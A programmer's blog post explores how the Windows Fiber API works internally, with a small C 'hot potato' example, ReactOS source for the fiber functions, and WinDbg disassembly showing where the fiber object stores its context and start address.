A Foray For Fun into Windows Fibers
The Windows fiber API has been described as one of the "most elegant" APIs available to the Windows programmer for manual execution scheduling.
I'm by no means an expert in how fibers work, nor how to deploy them into a large-scale application.
There is not a lot of documentation about how fibers work internally, so I thought it might be at least interesting or helpful to write about some of what I found.
ToC
0x00: About
"What is the Windows Fiber API?"
WELL, I'm very glad you asked. I mean, why else would you be here?
The Windows Fiber API exposes a means of manually "scheduling" execution within a process thread.
To quote MSDN:
"A fiber is a unit of execution that must be manually scheduled by the application. Fibers run in the context of the threads that schedule them. Each thread can schedule multiple fibers. In general, fibers do not provide advantages over a well-designed multithreaded application."
In regular terms, the Windows Fiber API provides developers with a means to manually schedule execution of many routines (converted to fibers) with a simple, lightweight API in one thread.
(Many Fibers, One Thread, Manually Switched)
A similar, thread-based API exists as the User Mode Scheduler API (UMS) which provides similar, more robust (read: complex), thread-based scheduling capabilities for developers.
(Many Threads, One Scheduler Routine)
While not the topic of this post, I found it relevant to call out because I think both APIs are pretty cool.
0x01: Intro
The example MSDN code is very nice, and can be located here.
For this much, MUCH simpler example, let's consider the following scenario:
We would like to create three routines HotPotatoOne, HotPotatoTwo, and HotPotatoThree.
Within one thread we want to schedule HotPotatoOne, HotPotatoTwo, and HotPotatoThree to "pass" eachother a "potato" (unsigned int).
Each fiber will receive one unsigned int parameter and add it's respective number to it, and return:
HotPotatoOne adds 1
HotPotatoOne switches to HotPotatoTwo
HotPotatoTwo adds 2
HotPotatoTwo switches to HotPotatoThree
HotPotatoThree adds 3
HotPotatoThree switches to HotPotatoOne
We will call each routine in a loop until the number is greater than 1337.
A sane programmer would not use fibers for this.
Luckily, as an IT consultant, I lost my sanity a while ago.
Let's consider what we need to do in order to accomplish this task:
1. Convert the instatniating (main, in our case) thread to a fiber (ConvertThreadToFiber)
2. Create a fiber for each of the HotPotato routines (CreateFiber)
3. Set the fiber data to a pointer to our starting number (GetFiberData, within the fiber)
4. Switch to each of the HotPotato fibers (SwitchToFiber)
5. Exit if the number is greater than 1337
Now, let's see how the code looks!
#include <Windows.h>
#include <stdio.h>
void __stdcall HotPotatoOne(LPVOID lpParam);
void __stdcall HotPotatoTwo(LPVOID lpParam);
void __stdcall HotPotatoThree(LPVOID lpParam);
#define FIBER_MAIN 0
#define FIBER_HP_ONE 1
#define FIBER_HP_TWO 2
#define FIBER_HP_THREE 3
unsigned int potato = 0;
LPVOID HOT_POTATOES[4] = { NULL, NULL, NULL, NULL };
int main() {
// Step 1
LPVOID AddrMainFiber = ConvertThreadToFiber(NULL);
// Step 2
LPVOID AddrHotPotatoOne = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoOne, &potato);
LPVOID AddrHotPotatoTwo = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoTwo, &potato);
LPVOID AddrHotPotatoThree = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoThree, &potato);
if (!(AddrMainFiber && AddrHotPotatoOne && AddrHotPotatoTwo && AddrHotPotatoThree)) {
puts("Couldn't create one of the fibers :(\nQuitting");
return 0;
}
HOT_POTATOES[FIBER_HP_ONE] = AddrHotPotatoOne;
HOT_POTATOES[FIBER_HP_TWO] = AddrHotPotatoTwo;
HOT_POTATOES[FIBER_HP_THREE] = AddrHotPotatoThree;
HOT_POTATOES[FIBER_MAIN] = AddrMainFiber;
// Step 4
SwitchToFiber(AddrHotPotatoOne);
DeleteFiber(HOT_POTATOES[FIBER_HP_ONE]);
DeleteFiber(HOT_POTATOES[FIBER_HP_TWO]);
DeleteFiber(HOT_POTATOES[FIBER_HP_THREE]);
DeleteFiber(HOT_POTATOES[FIBER_MAIN]);
return 1;
}
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
void __stdcall HotPotatoTwo(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 2;
printf("Hot Potato Two adds 2, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_THREE]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
void __stdcall HotPotatoThree(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 3;
printf("Hot Potato Three adds 3, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_ONE]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
The output from this is as expected!
Hot Potato One adds 1, potato is now 1!
Hot Potato Two adds 2, potato is now 3!
Hot Potato Three adds 3, potato is now 6!
Hot Potato One adds 1, potato is now 7!
Hot Potato Two adds 2, potato is now 9!
. . .
TRUNCATED
. . .
Hot Potato Three adds 3, potato is now 1332!
Hot Potato One adds 1, potato is now 1333!
Hot Potato Two adds 2, potato is now 1335!
Hot Potato Three adds 3, potato is now 1338!
Looking at each fiber method, the avid reader might notice something really odd about how we're handling control flow.
Let's take a look at how we're *switching* to our HotPotato routines.
For example, the first function, HotPotatoOne:
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[MAINFIBER]);
}
After incrementing our potato, we switch to the next HotPotato function.
Seems intuitive.
So why the do/while and the SwitchToFiber back to the main thread?
Consider an alternative function, BadHotPotatoOne:
void __stdcall BadHotPotatoOne(LPVOID lpParam) {
unsigned int* potato_local = (unsigned int*)GetFiberData();
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
if(*potato_local > 1337){
SwitchToFiber(HOT_POTATOES[MAINFIBER]);
}
}
BadHotPotatoOne switches to HotPotatoTwo
HotPotatoTwo switches to HotPotatoThree
HotPotatoThree switches to BadHotPotatoOne
What happens next?
When HotPotatoThree calls SwitchToFiber back to BadHotPotatoOne, SwitchToFiber begins execution based on the next instruction of BadHotPotatoOne after the call to SwitchToFiber.
In this case, the next instruction following our return to BadHotPotatoOne is our if statement, not the beginning of our fiber.
void __stdcall BadHotPotatoOne(LPVOID lpParam) {
unsigned int* potato_local = (unsigned int*)GetFiberData();
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]); <- Switches to HotPotatoTwo, then HotPotatoThree, then -
if(*potato_local > 1337){ <- Execution returns to the next statement when HotPotatoThree switches back
SwitchToFiber(HOT_POTATOES[MAINFIBER]);
}
}
As such we want to make sure our desired behavior of looping is the next instruction after our call to SwitchToFiber.
In our good function, HotPotatoOne, the next instruction is a "while" comparison, then a "do" loop which brings us back to HotPotatoTwo.
This way, when execution is switched back to HotPotatoOne from HotPotatoThree, we loop rather than return.
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]); <- Switches to HotPotatoTwo, then HotPotatoThree, then -
} while (*potato_local < 1337); <- Execution returns to comparison, keeps looping until *potato_local > 1337
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
Neat.
0x02: Instantiation
The documentation is a lie.
No, seriously. Well. Kind of.
The MSDN documentation for CreateFiber and ConvertThreadToFiber tells us that the return value is the address of the fiber.
This is "true," but misleading as the "FIBER" structure is not documented.
I originally interpreted it as the base address of the routine I'm Converting into/Creating as a fiber.
The ACTUAL return value of these functions is a fiber object. (Object in a representative sense, not the type sense).
This data structure seems to be very similar to a thread'sCONTEXT struct used in the Get/SetThreadContext functions.
Let's take a closer look into each function we called that returns an LPVOID fiber object (ConvertThreadToFiber, CreateFiber).
The fine folks at ReactOS have written an implementation of ConvertThreadToFiber/Ex.
Let's look at that source and compare with the disassembly of KernelBase!ConvertThreadToFiberEx.
ReactOS ConvertThreadToFiberEx:
LPVOID
WINAPI
ConvertThreadToFiberEx(_In_opt_ LPVOID lpParameter,
_In_ DWORD dwFlags)
{
PTEB Teb;
PFIBER Fiber;
DPRINT1("Converting Thread to Fiber\n");
/* Check for invalid flags */
if (dwFlags & ~FIBER_FLAG_FLOAT_SWITCH)
{
/* Fail */
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
/* Are we already a fiber? */
Teb = NtCurrentTeb();
if (Teb->HasFiberData)
{
/* Fail */
SetLastError(ERROR_ALREADY_FIBER);
return NULL;
}
/* Allocate the fiber */
Fiber = RtlAllocateHeap(RtlGetProcessHeap(),
0,
sizeof(FIBER));
if (!Fiber)
{
/* Fail */
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return NULL;
}
. . .
TRUNCATED, boring shit I don't care about
. . .
/* Associate the fiber to the current thread */
Teb->NtTib.FiberData = Fiber;
Teb->HasFiberData = TRUE; // what we really care about
/* Return opaque fiber data */
return (LPVOID)Fiber; // MSDN says this is a pointer to the fiber, rather than the fiber object
// HMMMMMMM
}
Compare this with the disassembly of KernelBase!ConvertThreadToFiberEx
KERNELBASE!ConvertThreadToFiber:
00007ffc`cdd58160 48895c2408 mov qword ptr [rsp+8], rbx ss:000000c4`533bf970={FiberBlog!_NULL_IMPORT_DESCRIPTOR (FiberBlog+0x22015) (00007ff6`49e62015)}
00007ffc`cdd58165 4889742410 mov qword ptr [rsp+10h], rsi
00007ffc`cdd5816a 57 push rdi
00007ffc`cdd5816b 4883ec20 sub rsp, 20h
00007ffc`cdd5816f 65488b3c2530000000 mov rdi, qword ptr gs:[30h]
; rdi gets a pointer to the current _NT_TIB
. . .
T R U N C A T E D
. . .
00007ffc`cdd58252 66838fee17000004 or word ptr [rdi+17EEh], 4
; Setting the Teb->HasFiberData flag to True
00007ffc`cdd5825a 48895720 mov qword ptr [rdi+20h], rdx
; Setting Teb->FiberData
00007ffc`cdd5825e 488b742438 mov rsi, qword ptr [rsp+38h]
00007ffc`cdd58263 488bc3 mov rax, rbx
00007ffc`cdd58266 488b5c2430 mov rbx, qword ptr [rsp+30h]
00007ffc`cdd5826b 4883c420 add rsp, 20h
00007ffc`cdd5826f 5f pop rdi
00007ffc`cdd58270 c3 ret
The behavior is, for all semantic purposes, identical. Thank you ReactOS team :)
So what's the deal with the TEB and TIB?
WELL, I'm glad you asked.
Let's take the two instructions from the disassembly and check to see what offsets they're referencing.
(rdi == TEB)
00007ffc`cdd58252 66838fee17000004 or word ptr [rdi+17EEh], 4
; Setting the Teb->HasFiberData flag to True
00007ffc`cdd5825a 48895720 mov qword ptr [rdi+20h], rdx
; Setting Teb->FiberData
Examining the TEB structure, we find that the WORD referenced by *(rdi+0x17ee) actually represents bit flags for different features in the process.
0:000> dt nt!_TEB
ntdll!_TEB
+0x17ee SameTebFlags : Uint2B
+0x17ee SafeThunkCall : Pos 0, 1 Bit
+0x17ee InDebugPrint : Pos 1, 1 Bit
+0x17ee HasFiberData : Pos 2, 1 Bit ; "or word ptr [rdi+17EEh], 4" sets this to TRUE
+0x17ee SkipThreadAttach : Pos 3, 1 Bit
+0x17ee WerInShipAssertCode : Pos 4, 1 Bit
+0x17ee RanProcessInit : Pos 5, 1 Bit
+0x17ee ClonedThread : Pos 6, 1 Bit
+0x17ee SuppressDebugMsg : Pos 7, 1 Bit
+0x17ee DisableUserStackWalk : Pos 8, 1 Bit
+0x17ee RtlExceptionAttached : Pos 9, 1 Bit
+0x17ee InitialThread : Pos 10, 1 Bit
+0x17ee SessionAware : Pos 11, 1 Bit
+0x17ee LoadOwner : Pos 12, 1 Bit
+0x17ee LoaderWorker : Pos 13, 1 Bit
+0x17ee SkipLoaderInit : Pos 14, 1 Bit
+0x17ee SpareSameTebBits : Pos 15, 1 Bit
We can also see that the QWORD PTR referenced by *(rdi+0x20) is a FiberData pointer in the process' TIB.
0:000> dt nt!_NT_TIB
ntdll!_NT_TIB
+0x000 ExceptionList : Ptr64 _EXCEPTION_REGISTRATION_RECORD
+0x008 StackBase : Ptr64 Void
+0x010 StackLimit : Ptr64 Void
+0x018 SubSystemTib : Ptr64 Void
+0x020 FiberData : Ptr64 Void ; This is what GetFiberData fetches
+0x020 Version : Uint4B
+0x028 ArbitraryUserPointer : Ptr64 Void
+0x030 Self : Ptr64 _NT_TIB
Neat. So our FiberData pointer and HasFiberData flag both live in the TEB.
One could define a GetFiberData macro essentially as a few intrinsic functions equivalent to:
void* GetFiberData(){
#ifdef _WIN64
return __readgsqword(0x20) // mov rax, gs:[20]
#else
return __readfsdword(0x20) // mov eax, fs:[20]
#endif
}
So how does CreateFiber store the instruction pointer of the function we desire?
Let's again go back to ReactOS for definition of CreateFiberEx (this time without truncation):
/*
* @implemented
*/
LPVOID
WINAPI
CreateFiberEx(_In_ SIZE_T dwStackCommitSize,
_In_ SIZE_T dwStackReserveSize,
_In_ DWORD dwFlags,
_In_ LPFIBER_START_ROUTINE lpStartAddress,
_In_opt_ LPVOID lpParameter)
{
PFIBER Fiber; !! Note this
NTSTATUS Status;
INITIAL_TEB InitialTeb;
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
DPRINT("Creating Fiber\n");
/* Check for invalid flags */
if (dwFlags & ~FIBER_FLAG_FLOAT_SWITCH)
{
/* Fail */
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
/* Allocate the Activation Context Stack */
ActivationContextStackPointer = NULL;
Status = RtlAllocateActivationContextStack(&ActivationContextStackPointer);
if (!NT_SUCCESS(Status))
{
/* Fail */
BaseSetLastNTError(Status);
return NULL;
}
/* Allocate the fiber */
Fiber = RtlAllocateHeap(RtlGetProcessHeap(),
0,
sizeof(FIBER));
if (!Fiber)
{
/* Free the activation context stack */
RtlFreeActivationContextStack(ActivationContextStackPointer);
/* Fail */
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return NULL;
}
/* Create the stack for the fiber */
Status = BaseCreateStack(NtCurrentProcess(),
dwStackCommitSize,
dwStackReserveSize,
&InitialTeb);
if (!NT_SUCCESS(Status))
{
/* Free the fiber */
RtlFreeHeap(GetProcessHeap(),
0,
Fiber);
/* Free the activation context stack */
RtlFreeActivationContextStack(ActivationContextStackPointer);
/* Failure */
BaseSetLastNTError(Status);
return NULL;
}
/* Clear the context */
RtlZeroMemory(&Fiber->FiberContext,
sizeof(CONTEXT));
/* Copy the data into the fiber */
Fiber->StackBase = InitialTeb.StackBase;
Fiber->StackLimit = InitialTeb.StackLimit;
Fiber->DeallocationStack = InitialTeb.AllocatedStackBase;
Fiber->FiberData = lpParameter;
Fiber->ExceptionList = EXCEPTION_CHAIN_END;
Fiber->GuaranteedStackBytes = 0;
Fiber->FlsData = NULL;
Fiber->ActivationContextStackPointer = ActivationContextStackPointer;
/* Save FPU State if requested, otherwise just the basic registers */
Fiber->FiberContext.ContextFlags = (dwFlags & FIBER_FLAG_FLOAT_SWITCH) ?
(CONTEXT_FULL | CONTEXT_FLOATING_POINT) :
CONTEXT_FULL;
/* Initialize the context for the fiber */
BaseInitializeContext(&Fiber->FiberContext, // AHA! We found the CONTEXT we were looking for!
lpParameter,
lpStartAddress
InitialTeb.StackBase,
2);
/* Return the Fiber */
return Fiber;
}
Neat!
So now let's check KernelBase!CreateFiberEx to see how it works the same:
TRIMMED FOR BREVITY
00007ffc`cdcf5511 48ff1598a31b00 call qword ptr [KERNELBASE!_imp_RtlAllocateHeap (00007ffc`cdeaf8b0)] ; Allocating the fiber object on the heap
00007ffc`cdcf5518 0f1f440000 nop dword ptr [rax+rax]
00007ffc`cdcf551d 488bf8 mov rdi, rax ; store it's pointer in rdi
00007ffc`cdcf5520 4885c0 test rax, rax
00007ffc`cdcf5523 0f8418f80800 je KERNELBASE!CreateFiberEx+0x8f8b1 (00007ffc`cdd84d41)
00007ffc`cdcf5529 8b05c9682800 mov eax, dword ptr [KERNELBASE!SysInfo+0x18 (00007ffc`cdf7bdf8)]
00007ffc`cdcf552f 488d4dd0 lea rcx, [rbp-30h]
00007ffc`cdcf5533 448b0dae682800 mov r9d, dword ptr [KERNELBASE!SysInfo+0x8 (00007ffc`cdf7bde8)]
00007ffc`cdcf553a 4533c0 xor r8d, r8d
00007ffc`cdcf553d 48894c2428 mov qword ptr [rsp+28h], rcx
00007ffc`cdcf5542 488bd3 mov rdx, rbx
00007ffc`cdcf5545 498bcf mov rcx, r15
00007ffc`cdcf5548 4889442420 mov qword ptr [rsp+20h], rax
00007ffc`cdcf554d 48ff1524a01b00 call qword ptr [KERNELBASE!_imp_RtlCreateUserStack (00007ffc`cdeaf578)]
00007ffc`cdcf5554 0f1f440000 nop dword ptr [rax+rax]
00007ffc`cdcf5559 85c0 test eax, eax
00007ffc`cdcf555b 0f885ff80800 js KERNELBASE!CreateFiberEx+0x8f930 (00007ffc`cdd84dc0)
00007ffc`cdcf5561 33c0 xor eax, eax
00007ffc`cdcf5563 4c896dc8 mov qword ptr [rbp-38h], r13
00007ffc`cdcf5567 f3480f1ec8 rdsspq rax
00007ffc`cdcf556c 4885c0 test rax, rax
00007ffc`cdcf556f 0f8582f80800 jne KERNELBASE!CreateFiberEx+0x8f967 (00007ffc`cdd84df7)
00007ffc`cdcf5575 33d2 xor edx, edx
00007ffc`cdcf5577 488d4f30 lea rcx, [rdi+30h] ; Remember how the fiber object' CONTEXT is offset 0x30 from it's base? Load that into rcx
00007ffc`cdcf557b 41b8d0040000 mov r8d, 4D0h
00007ffc`cdcf5581 e839c90800 call KERNELBASE!memset (00007ffc`cdd81ebf) ; Zero it
00007ffc`cdcf5586 488b5550 mov rdx, qword ptr [rbp+50h]
00007ffc`cdcf558a 488d4f30 lea rcx, [rdi+30h]
00007ffc`cdcf558e 488917 mov qword ptr [rdi], rdx ds:000002aa`f96b23a0=000002aaf96a0150
00007ffc`cdcf5591 4080e601 and sil, 1
00007ffc`cdcf5595 488b45e0 mov rax, qword ptr [rbp-20h]
00007ffc`cdcf5599 4d8bc4 mov r8, r12
00007ffc`cdcf559c 48894710 mov qword ptr [rdi+10h], rax
00007ffc`cdcf55a0 488b45e8 mov rax, qword ptr [rbp-18h]
00007ffc`cdcf55a4 48894718 mov qword ptr [rdi+18h], rax
00007ffc`cdcf55a8 488b45f0 mov rax, qword ptr [rbp-10h]
00007ffc`cdcf55ac 48834f08ff or qword ptr [rdi+8], 0FFFFFFFFFFFFFFFFh
00007ffc`cdcf55b1 48894720 mov qword ptr [rdi+20h], rax
00007ffc`cdcf55b5 4c89af00050000 mov qword ptr [rdi+500h], r13
00007ffc`cdcf55bc 4c89af10050000 mov qword ptr [rdi+510h], r13
00007ffc`cdcf55c3 4489af18050000 mov dword ptr [rdi+518h], r13d
00007ffc`cdcf55ca 664489af1c050000 mov word ptr [rdi+51Ch], r13w
00007ffc`cdcf55d2 488b45c0 mov rax, qword ptr [rbp-40h]
00007ffc`cdcf55d6 48898708050000 mov qword ptr [rdi+508h], rax
00007ffc`cdcf55dd 488b4710 mov rax, qword ptr [rdi+10h]
00007ffc`cdcf55e1 483305e0672800 xor rax, qword ptr [KERNELBASE!BasepFiberCookie (00007ffc`cdf7bdc8)]
00007ffc`cdcf55e8 4833c7 xor rax, rdi
00007ffc`cdcf55eb 4c89742420 mov qword ptr [rsp+20h], r14
00007ffc`cdcf55f0 48898720050000 mov qword ptr [rdi+520h], rax
00007ffc`cdcf55f7 40f6de neg sil
00007ffc`cdcf55fa 488b45c8 mov rax, qword ptr [rbp-38h]
00007ffc`cdcf55fe 48898728050000 mov qword ptr [rdi+528h], rax
00007ffc`cdcf5605 1bc0 sbb eax, eax
00007ffc`cdcf5607 2508001000 and eax, 100008h
00007ffc`cdcf560c 894760 mov dword ptr [rdi+60h], eax
00007ffc`cdcf560f 4c8b4de0 mov r9, qword ptr [rbp-20h]
00007ffc`cdcf5613 e828000000 call KERNELBASE!BaseInitializeFiberContext (00007ffc`cdcf5640) ; Initialize the CONTEXT with the created fiber's routine address
00007ffc`cdcf5618 488bc7 mov rax, rdi
00007ffc`cdcf561b 4c8d5c2470 lea r11, [rsp+70h]
00007ffc`cdcf5620 498b5b30 mov rbx, qword ptr [r11+30h]
00007ffc`cdcf5624 498b7338 mov rsi, qword ptr [r11+38h]
00007ffc`cdcf5628 498b7b40 mov rdi, qword ptr [r11+40h]
00007ffc`cdcf562c 498be3 mov rsp, r11
00007ffc`cdcf562f 415f pop r15
00007ffc`cdcf5631 415e pop r14
00007ffc`cdcf5633 415d pop r13
00007ffc`cdcf5635 415c pop r12
00007ffc`cdcf5637 5d pop rbp
00007ffc`cdcf5638 c3 ret
The BaseInitializeFiberContext function has two arguments that we care about in rcx and r8:
CONTEXT for the fiber, and LPFIBER_START_ROUTINE respectively.
By taking a look at the disassembly for BaseInitializeFiberContext, we can find out where exactly the real instruction pointer goes in the fiber object.
KERNELBASE!BaseInitializeFiberContext:
00007ffc`cdcf5640 48895c2408 mov qword ptr [rsp+8], rbx ss:000000c4`533bf890=0000000000001000
00007ffc`cdcf5645 48896c2410 mov qword ptr [rsp+10h], rbp
00007ffc`cdcf564a 4889742418 mov qword ptr [rsp+18h], rsi
00007ffc`cdcf564f 57 push rdi
00007ffc`cdcf5650 4883ec20 sub rsp, 20h
00007ffc`cdcf5654 498bf0 mov rsi, r8 ; rsi now holds LPFIBER_START_ROUTINE
00007ffc`cdcf5657 488bea mov rbp, rdx
00007ffc`cdcf565a 33d2 xor edx, edx
00007ffc`cdcf565c 41b8d0040000 mov r8d, 4D0h
00007ffc`cdcf5662 498bf9 mov rdi, r9
00007ffc`cdcf5665 488bd9 mov rbx, rcx ; rbx now holds CONTEXT for the fiber
00007ffc`cdcf5668 e852c80800 call KERNELBASE!memset (00007ffc`cdd81ebf)
00007ffc`cdcf566d c743300b001000 mov dword ptr [rbx+30h], 10000Bh
00007ffc`cdcf5674 65488b042560000000 mov rax, qword ptr gs:[60h]
00007ffc`cdcf567d f6400304 test byte ptr [rax+3], 4
00007ffc`cdcf5681 0f8499000000 je KERNELBASE!BaseInitializeFiberContext+0xe0 (00007ffc`cdcf5720)
00007ffc`cdcf5687 0f31 rdtsc
00007ffc`cdcf5689 8b0d59672800 mov ecx, dword ptr [KERNELBASE!SysInfo+0x8 (00007ffc`cdf7bde8)]
00007ffc`cdcf568f 48c1e220 shl rdx, 20h
00007ffc`cdcf5693 480bc2 or rax, rdx
00007ffc`cdcf5696 48c1e905 shr rcx, 5
00007ffc`cdcf569a 33d2 xor edx, edx
00007ffc`cdcf569c 48f7f1 div rax, rcx
00007ffc`cdcf569f 48c1e204 shl rdx, 4
00007ffc`cdcf56a3 b9801f0000 mov ecx, 1F80h
00007ffc`cdcf56a8 4889b380000000 mov qword ptr [rbx+80h], rsi ; AHA! We have found that the instruction pointer is at offset 0x80 from the CONTEXT
00007ffc`cdcf56af 488b742440 mov rsi, qword ptr [rsp+40h]
00007ffc`cdcf56b4 488d05d5d60600 lea rax, [KERNELBASE!BaseFiberStart (00007ffc`cdd62d90)]
00007ffc`cdcf56bb 48894378 mov qword ptr [rbx+78h], rax
00007ffc`cdcf56bf 482bfa sub rdi, rdx
00007ffc`cdcf56c2 894b34 mov dword ptr [rbx+34h], ecx
00007ffc`cdcf56c5 b87f020000 mov eax, 27Fh
00007ffc`cdcf56ca 898b18010000 mov dword ptr [rbx+118h], ecx
00007ffc`cdcf56d0 b92b000000 mov ecx, 2Bh
00007ffc`cdcf56d5 66898300010000 mov word ptr [rbx+100h], ax
00007ffc`cdcf56dc 66894b42 mov word ptr [rbx+42h], cx
00007ffc`cdcf56e0 4889ab88000000 mov qword ptr [rbx+88h], rbp
00007ffc`cdcf56e7 488b6c2438 mov rbp, qword ptr [rsp+38h]
00007ffc`cdcf56ec 8d4108 lea eax, [rcx+8]
00007ffc`cdcf56ef 66894338 mov word ptr [rbx+38h], ax
00007ffc`cdcf56f3 488d4fd0 lea rcx, [rdi-30h]
00007ffc`cdcf56f7 488b442450 mov rax, qword ptr [rsp+50h]
00007ffc`cdcf56fc c7433a2b002b00 mov dword ptr [rbx+3Ah], 2B002Bh
00007ffc`cdcf5703 c7433e53002b00 mov dword ptr [rbx+3Eh], 2B0053h
00007ffc`cdcf570a 48898b98000000 mov qword ptr [rbx+98h], rcx
00007ffc`cdcf5711 488b5c2430 mov rbx, qword ptr [rsp+30h]
00007ffc`cdcf5716 488901 mov qword ptr [rcx], rax
00007ffc`cdcf5719 4883c420 add rsp, 20h
00007ffc`cdcf571d 5f pop rdi
00007ffc`cdcf571e c3 ret
00007ffc`cdcf571f cc int 3
00007ffc`cdcf5720 33d2 xor edx, edx
00007ffc`cdcf5722 e97cffffff jmp KERNELBASE!BaseInitializeFiberContext+0x63 (00007ffc`cdcf56a3)
From all of this we can see the allocation of the FIBER struct, allocating/constructing the ActCtx and the stack, instantiating the CONTEXT for the fiber with the instruction pointer to our fiber routine!
Awesome!
So now that means the offset of the instruction pointer is at offset 0x80 from the CONTEXT, which is itself offset 0x30 from the fiber object for total offset of 0xB0.
A quick definition of ReactOS' FIBER structure:
Note: This structure is not complete for replication in W10 20H2 x64 (not sure about others)
typedef struct _FIBER /* Field offsets: */
{ /* i386 arm x64 */
PVOID FiberData; /* 0x000 0x000 0x000 */
struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList;/* 0x004 0x004 0x008 */
PVOID StackBase; /* 0x008 0x008 0x010 */
PVOID StackLimit; /* 0x00C 0x00C 0x018 */
PVOID DeallocationStack; /* 0x010 0x010 0x020 */
CONTEXT FiberContext; /* 0x014 0x018 0x030 */
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID Wx86Tib; /* 0x2E0 0x1b8 0x500 */
struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 0x2E4 0x1bc 0x508 */
PVOID FlsData; /* 0x2E8 0x1c0 0x510 */
ULONG GuaranteedStackBytes; /* 0x2EC 0x1c4 0x518 */
ULONG TebFlags; /* 0x2F0 0x1c8 0x51C */
#else
ULONG GuaranteedStackBytes; /* 0x2E0 */
PVOID FlsData; /* 0x2E4 */
struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer;
#endif
} FIBER, *PFIBER;
Let's check out this CONTEXT within our LPVOID from CreateFiber to ensure the CONTEXT indeed has our HotPotatoOne address:
Immediately after our call to CreateFiber(0, HotPotatoOne, &potato)
0:000> u rip-6
FiberBlog!main+0x46 [Source.cpp @ 23]:
00007ff6`49e55d76 ff158cb20000 call qword ptr [FiberBlog!_imp_CreateFiber (00007ff6`49e61008)]
00007ff6`49e55d7c 48894528 mov qword ptr [rbp+28h],rax ; rip, rax contains fiber object
00007ff6`49e55d80 4c8d0589790000 lea r8,[FiberBlog!potato (00007ff6`49e5d710)]
00007ff6`49e55d87 488d1564b6ffff lea rdx,[FiberBlog!ILT+1005(?HotPotatoTwoYAXPEAXZ) (00007ff6`49e513f2)]
00007ff6`49e55d8e 33c9 xor ecx,ecx
00007ff6`49e55d90 ff1572b20000 call qword ptr [FiberBlog!_imp_CreateFiber (00007ff6`49e61008)]
00007ff6`49e55d96 48894548 mov qword ptr [rbp+48h],rax
00007ff6`49e55d9a 4c8d056f790000 lea r8,[FiberBlog!potato (00007ff6`49e5d710)]
check the LPVOID fiber object for our fiber's instruction pointer, rax + 0xB0
0:000> dq rax+0xb0 L1
000002aa`f96b2450 00007ff6`49e513f7
0:000> u poi(rax+0xb0)
FiberBlog!ILT+1010(?HotPotatoOneYAXPEAXZ):
00007ff6`49e513f7 e914460000 jmp FiberBlog!HotPotatoOne (00007ff6`49e55a10)
Nice! The fiber routine's instruction pointer is at the fiber object + 0xb0!
So far we've seen how to use them, how control flow works, a bit about how they're created, and now let's talk execution!
0x03: Execution
Looking back on our HotPotatoOne's control flow decisions, you may be wondering:
"How does switching work such that you needed the do/while?"
WELL, I'm glad you asked!
When one fiber switches to another via SwitchToFiber, the current execution context information is saved to that fiber object's context structure.
We can see in more detail as we look at the disassembly of KernelBase!SwitchToFiber:
KERNELBASE!SwitchToFiber:
00007ffc`cdd5acd0 4883ec28 sub rsp, 28h
00007ffc`cdd5acd4 65488b042530000000 mov rax, qword ptr gs:[30h]
00007ffc`cdd5acdd 483b4820 cmp rcx, qword ptr [rax+20h]
00007ffc`cdd5ace1 7420 je KERNELBASE!SwitchToFiber+0x33 (00007ffc`cdd5ad03)
00007ffc`cdd5ace3 488b4110 mov rax, qword ptr [rcx+10h]
00007ffc`cdd5ace7 483305da102200 xor rax, qword ptr [KERNELBASE!BasepFiberCookie (00007ffc`cdf7bdc8)]
00007ffc`cdd5acee 4833c1 xor rax, rcx
00007ffc`cdd5acf1 48398120050000 cmp qword ptr [rcx+520h], rax
00007ffc`cdd5acf8 0f85dc750400 jne KERNELBASE!SwitchToFiber+0x4760a (00007ffc`cdda22da)
00007ffc`cdd5acfe e86d720200 call KERNELBASE!SwitchToFiberContext (00007ffc`cdd81f70) ; Where the real magic happens
00007ffc`cdd5ad03 4883c428 add rsp, 28h
00007ffc`cdd5ad07 c3 ret
Most importantly, we see a call to KernelBase!SwitchToFiberContext.
This function is responsible for saving off our fiber object's context, and changing the next execution context to the destination fiber object's context.
